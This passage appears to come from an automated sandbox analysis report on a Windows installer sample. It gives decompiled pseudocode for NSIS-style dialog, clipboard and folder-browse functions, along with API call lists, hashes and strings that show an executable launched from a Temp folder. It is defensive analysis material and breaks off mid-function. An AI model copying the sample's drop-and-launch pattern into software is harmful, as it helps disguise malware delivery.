                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                    • Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                                    • Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                    • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE ref: 00405B13
                                    • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                    • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                    • Part of subcall function 0040697F: GetExitCodeProcess.KERNELBASE ref: 004069B2
                                    • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 2972824698-0
                                  • Opcode ID: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
                                  • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                                  • Opcode Fuzzy Hash: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
                                  • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429204;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423708;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291ec == _t156) {
							ShowWindow( *0x42a228, 8);
							if( *0x42a2ac == _t156) {
								E00405569( *((intOrPtr*)( *0x4226e0 + 0x34)), _t156);
							}
							E0040443C(_t171);
							goto L25;
						}
						 *0x421ed8 = 2;
						E0040443C(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044CA(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291f0, _t156);
						ShowWindow(_t169, 8);
						E00404498(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a230;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291f0 = GetDlgItem(_a4, 0x403);
				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429204 = _t134;
				_v8 = _t134;
				E00404498( *0x4291f0);
				 *0x4291f4 = E00404DF1(4);
				 *0x42920c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404463(_a4);
				if(( *0x42a238 & 0x00000003) != 0) {
					ShowWindow( *0x4291f0, _t156);
					if(( *0x42a238 & 0x00000002) != 0) {
						 *0x4291f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404498( *0x4291e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a238 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                  0x004056b0
                                  0x004056b6
                                  0x004056c0
                                  0x004056c3
                                  0x00405859
                                  0x0040587d
                                  0x0040587d
                                  0x00405890
                                  0x004058ae
                                  0x004058b0
                                  0x004058b8
                                  0x0040590e
                                  0x00405912
                                  0x00000000
                                  0x00000000
                                  0x00405914
                                  0x0040591a
                                  0x00000000
                                  0x00000000
                                  0x00405924
                                  0x0040592c
                                  0x0040592f
                                  0x00405a31
                                  0x00000000
                                  0x00405a31
                                  0x0040593e
                                  0x00405949
                                  0x00405952
                                  0x0040595d
                                  0x00405960
                                  0x00405969
                                  0x0040596f
                                  0x00405972
                                  0x00405972
                                  0x0040598a
                                  0x00405993
                                  0x00405996
                                  0x0040599d
                                  0x004059a4
                                  0x004059ac
                                  0x004059ac
                                  0x004059c3
                                  0x004059c3
                                  0x004059ca
                                  0x004059d0
                                  0x004059dc
                                  0x004059e3
                                  0x004059ec
                                  0x004059ee
                                  0x004059f1
                                  0x00405a00
                                  0x00405a03
                                  0x00405a09
                                  0x00405a0a
                                  0x00405a10
                                  0x00405a11
                                  0x00405a12
                                  0x00405a1a
                                  0x00405a25
                                  0x00405a2b
                                  0x00405a2b
                                  0x00000000
                                  0x0040598a
                                  0x004058c0
                                  0x004058f0
                                  0x004058f8
                                  0x00405903
                                  0x00405903
                                  0x00405909
                                  0x00000000
                                  0x00405909
                                  0x004058c4
                                  0x004058ce
                                  0x00000000
                                  0x00405892
                                  0x00405898
                                  0x004058d3
                                  0x00000000
                                  0x004058dc
                                  0x004058a1
                                  0x004058a6
                                  0x004058a9
                                  0x00000000
                                  0x004058a9
                                  0x00405890
                                  0x004056c9
                                  0x004056cd
                                  0x004056d5
                                  0x004056d9
                                  0x004056dc
                                  0x004056df
                                  0x004056e2
                                  0x004056e5
                                  0x004056e6
                                  0x004056e7
                                  0x00405700
                                  0x00405703
                                  0x0040570d
                                  0x0040571c
                                  0x00405724
                                  0x0040572c
                                  0x00405731
                                  0x00405734
                                  0x00405740
                                  0x00405749
                                  0x00405752
                                  0x00405774
                                  0x0040577a
                                  0x0040578b
                                  0x00405790
                                  0x0040579e
                                  0x004057ac
                                  0x004057ac
                                  0x004057b1
                                  0x004057bf
                                  0x004057bf
                                  0x004057c4
                                  0x004057c7
                                  0x004057cc
                                  0x004057d8
                                  0x004057e1
                                  0x004057ee
                                  0x004057fd
                                  0x004057f0
                                  0x004057f5
                                  0x004057f5
                                  0x00405809
                                  0x00405809
                                  0x0040581d
                                  0x00405826
                                  0x0040582f
                                  0x0040583f
                                  0x0040584b
                                  0x0040584b
                                  0x00000000

                                  APIs
                                  • GetDlgItem.USER32 ref: 00405706
                                  • GetDlgItem.USER32 ref: 00405715
                                  • GetClientRect.USER32 ref: 00405752
                                  • GetSystemMetrics.USER32 ref: 00405759
                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                  • ShowWindow.USER32(?,00000008), ref: 004057F5
                                  • GetDlgItem.USER32 ref: 00405816
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                  • GetDlgItem.USER32 ref: 00405724
                                    • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                  • GetDlgItem.USER32 ref: 00405868
                                  • CreateThread.KERNEL32 ref: 00405876
                                  • CloseHandle.KERNEL32(00000000), ref: 0040587D
                                  • ShowWindow.USER32(00000000), ref: 004058A1
                                  • ShowWindow.USER32(?,00000008), ref: 004058A6
                                  • ShowWindow.USER32(00000008), ref: 004058F0
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                  • CreatePopupMenu.USER32 ref: 00405935
                                  • AppendMenuW.USER32 ref: 00405949
                                  • GetWindowRect.USER32 ref: 00405969
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                  • OpenClipboard.USER32(00000000), ref: 004059CA
                                  • EmptyClipboard.USER32 ref: 004059D0
                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                  • GlobalLock.KERNEL32 ref: 004059E6
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                                  • CloseClipboard.USER32 ref: 00405A2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                                  • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                  • Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                                  • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226e0;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B4B(0x3fb, _t146);
					E0040678E(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B4B(0x3fb, _t146);
							if(E00405EDE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406507(0x4216d8, _t146);
							_t87 = E004068D4(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406507(0x4216d8, _t146);
								_t89 = E00405E81(0x4216d8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216d8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E22(0x4216d8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216d8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404DF1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
									E00404DD9(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216c8);
									} else {
										E00404D10(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404485(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
									E004048AD();
								}
								 *0x4236f8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423708;
							_v60 = E00404CAA;
							_v56 = _t146;
							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DD6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00406544(_t146, 0x423708, _t167, 0, _t125);
									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
										lstrcatW(_t146, 0x4281c0);
									}
								}
								 *0x4236f8 =  *0x4236f8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
						E00405DD6(_t146);
					}
					 *0x4291f8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404463(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404463(_t167);
					E00404498(_t166);
					_t138 = E004068D4(8);
					if(_t138 == 0) {
						L53:
						return E004044CA(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                  0x00404954
                                  0x0040495a
                                  0x00404960
                                  0x0040496d
                                  0x0040497b
                                  0x0040497e
                                  0x00404986
                                  0x0040498c
                                  0x0040498c
                                  0x00404998
                                  0x0040499b
                                  0x00404a09
                                  0x00404a10
                                  0x00404ae7
                                  0x00404aee
                                  0x00404afd
                                  0x00404afd
                                  0x00404b01
                                  0x00404b0b
                                  0x00404b18
                                  0x00404b1a
                                  0x00404b1a
                                  0x00404b28
                                  0x00404b2f
                                  0x00404b36
                                  0x00404b39
                                  0x00404b75
                                  0x00404b77
                                  0x00404b7d
                                  0x00404b82
                                  0x00404b86
                                  0x00404b88
                                  0x00404b88
                                  0x00404ba4
                                  0x00000000
                                  0x00404ba6
                                  0x00404ba9
                                  0x00404bb7
                                  0x00404bbd
                                  0x00404bbe
                                  0x00404bc1
                                  0x00404bc4
                                  0x00000000
                                  0x00404bc4
                                  0x00404b3b
                                  0x00404b3d
                                  0x00404b41
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404b43
                                  0x00404b43
                                  0x00404b50
                                  0x00404b55
                                  0x00000000
                                  0x00000000
                                  0x00404b59
                                  0x00404b5b
                                  0x00404b5b
                                  0x00404b64
                                  0x00404b66
                                  0x00404b6b
                                  0x00404b6e
                                  0x00404b73
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404b73
                                  0x00404bd0
                                  0x00404bda
                                  0x00404bdd
                                  0x00404be0
                                  0x00404be7
                                  0x00404be7
                                  0x00404be9
                                  0x00404be9
                                  0x00404bee
                                  0x00404bf0
                                  0x00404bf8
                                  0x00404bff
                                  0x00404c01
                                  0x00404c0c
                                  0x00404c0c
                                  0x00404c01
                                  0x00404c1c
                                  0x00404c26
                                  0x00404c2e
                                  0x00404c49
                                  0x00404c30
                                  0x00404c39
                                  0x00404c39
                                  0x00404c2e
                                  0x00404c4e
                                  0x00404c53
                                  0x00404c58
                                  0x00404c61
                                  0x00404c61
                                  0x00404c6a
                                  0x00404c6c
                                  0x00404c6c
                                  0x00404c78
                                  0x00404c80
                                  0x00404c8a
                                  0x00404c8a
                                  0x00404c8f
                                  0x00000000
                                  0x00404c8f
                                  0x00404b39
                                  0x00404af0
                                  0x00404af7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404af7
                                  0x00404a16
                                  0x00404a1f
                                  0x00404a39
                                  0x00404a3e
                                  0x00404a48
                                  0x00404a4f
                                  0x00404a5b
                                  0x00404a5e
                                  0x00404a61
                                  0x00404a68
                                  0x00404a70
                                  0x00404a73
                                  0x00404a77
                                  0x00404a7e
                                  0x00404a86
                                  0x00404ae0
                                  0x00404a88
                                  0x00404a89
                                  0x00404a90
                                  0x00404a9a
                                  0x00404aa2
                                  0x00404aaf
                                  0x00404ac3
                                  0x00404ac7
                                  0x00404ac7
                                  0x00404ac3
                                  0x00404acc
                                  0x00404ad9
                                  0x00404ad9
                                  0x00404a86
                                  0x00000000
                                  0x00404a3e
                                  0x00404a2c
                                  0x00000000
                                  0x00000000
                                  0x00404a32
                                  0x00000000
                                  0x0040499d
                                  0x004049aa
                                  0x004049b3
                                  0x004049c0
                                  0x004049c0
                                  0x004049c7
                                  0x004049cd
                                  0x004049d6
                                  0x004049d9
                                  0x004049dc
                                  0x004049e4
                                  0x004049e7
                                  0x004049ea
                                  0x004049f0
                                  0x004049f7
                                  0x004049fe
                                  0x00404c95
                                  0x00404ca7
                                  0x00404a04
                                  0x00404a07
                                  0x00000000
                                  0x00404a07
                                  0x004049fe

                                  APIs
                                  • GetDlgItem.USER32 ref: 004049A3
                                  • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                  • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00423708,00000000,?,?), ref: 00404ABB
                                  • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj), ref: 00404AC7
                                  • SetDlgItemTextW.USER32 ref: 00404AD9
                                    • Part of subcall function 00405B4B: GetDlgItemTextW.USER32 ref: 00405B5E
                                    • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                    • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                    • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                    • Part of subcall function 0040678E: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                  • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                    • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                    • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                    • Part of subcall function 00404D10: SetDlgItemTextW.USER32 ref: 00404DCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                  • API String ID: 2624150263-1176606499
                                  • Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                                  • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                  • Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                                  • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
